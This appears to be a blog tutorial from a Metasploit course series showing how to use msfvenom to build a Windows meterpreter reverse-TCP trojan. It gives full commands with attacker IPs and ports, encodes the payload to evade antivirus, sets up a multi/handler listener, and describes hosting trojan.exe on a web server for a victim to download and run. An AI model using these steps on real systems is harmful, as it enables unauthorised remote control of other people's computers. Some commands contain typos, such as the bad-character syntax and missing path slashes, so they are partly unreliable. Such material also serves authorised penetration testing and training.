Hello and welcome to my blog, I am reaching you with a latest and most knowledgeable post. As you know msfpayload was used to create payloads (generally called trojan /backdoor ) and msfencode was used to encode payloads for avoiding antivirus detection. you can read in my old post Creating Trojan Horse (Encoded)By Using Msfpayload but both of them msfpayload and msfencode have been removed from the metasploit framework on June 8th 2015.
So what is now?
Answer is msfvenom
In this article, I will cover what is msfvenom, use of msfvenom, generate and encode payload by msfvenom, avoid bad characters by msfvenom, start multi handler server to listen to trojan backdoor.
What is msfvenom?
In simple word “msfvenom is a combination of msfpayload and msfencode. it is used to generate payloads and encode them as well.” Now you don’t need to run two different commands to create a payload and encode it. msfvenom comes default in Metasploit, so you don’t need to install an extra package in your system for more detail about Metasploit https://www.metasploit.com/ for Tutorial you read my metasploit guide section.
Metasploit command line interface msfconsole and GUI Armitage are preinstalled in Kali Linux’s current version Kali 2016.2. I will describe the tutorial using Kali Linux.
Let’s start using MSFvenom
In Kali Linux, right-click on the desktop desktop then click on the open terminal. A new terminal window will be open type the following command
How to generate a payload using MSFvenom
To generate a payload there are two switches that must be used -p and -f. -p for payload and -f for output file format. You should know first which payload you are going to use. To print the available list of payloads use -l
#msfvenom -l payloads
After selecting the appropriate payload. Use the following code
#msfvenom -p <payload> -f <file format>
To know more about formats use the following code
#msfvenom -p windows/meterpreter/reverse_tcp -f exe > PATH
The final code would be
#msfvenom -p windows/meterpreter/reverse_tcp -f exe > /root/Desktop/trojan.exe
Before executing the final code you should know about payload options to be used. You can see in the above code payload is for giving the connection back to the attacker. But it will not send back a connection to the attacker, reason, in this code options are not specified yet. So you must know about available options for windows/meterpreter/reverse_tcp. Go through the following code
#msfvenom –payload-options -p <payload >
Now the code is
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker IP] LPORT=[desired port] -f exe > root/Desktop/trojan.exe
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.100 LPORT=4444 -f exe > root/Desktop/trojan.exe
It’s good news that your payload is ready, you can send this payload to the victim’s machine and when the victim will execute this file he will be hacked. But this payload is well known and most antivirus are aware of it. Antivirus will detect easily this code and will remove it. So what is next?
You can do the following things;
- Avoid the bad character
- Encode the payload
How to avoid bad characters from the payloads by using msfvenom
As you have seen in the help menu of msfvenom, the -b flag is to be used to avoid certain bad characters from the payload. When the -b switch is used, msfvenom find a good encoder to encode the payload and avoid bad character automatically
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -b ‘/x00’ -f exe > root/Desktop/trojan.exe
How to encode a payload by msfvenom
When you will use -b flag, the payload will be encoded automatically with a good encoder. But if you still want to use a specific encoder then you can use -e [encoder name] code. You can use only the available encoder with msfvenom. So first use the following code to know about available encoder
Msfvenom -l encoder
Your final code will be
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -f exe > root/Desktop/trojan.exe
The number of times to encode the payload
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > root/Desktop/trojan.exe
Use architecture and platform for payload by msfvenom
-a <x64/x86> to be used to define architecture. and –platform for the platform but first check the available platform in Metasploit.
#msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > root/Desktop/trojan.exe
Start multi handler server on the attacker machine
Trojan will be executed on the victim’s machine and it will send a back connection to the attacker’s machine. So attacker must have a listener server on its machine. You can start multi handler server on your attacker machine by following the instruction
>set payload windows/meterpreter/reverse_tcp
>set LHOST 192.168.56.100 [attacker IP]
>set LPORT 4444
This is a very important phase. you have created trojan.exe and started multi/handler server, Next step send it to the victim machine. I started the apache2 web server and moved trojan.exe /var/www/html. and I have forwarded port 80 to my attacker machine on the router. and I send the link http://AttackerIP/trojan.exe. The victim downloads a trojan and executes it. the session will be created
MODULE 13:- Metasploit Framework
- 6 Metasploit Modules – You should know
- MSFvenom replacement of MSFpayload and msfencode – Full guide
- 6 Techniques to analyze the vulnerability scan report in Metasploit
- How to use Metasploit for vulnerability scanning
- How to use metasploit pro in Kali Linux
- Creating Persistent Backdoor By Metasploit in Kali Linux
- Creating Trojan Horse (Encoded)By Using Msfpayload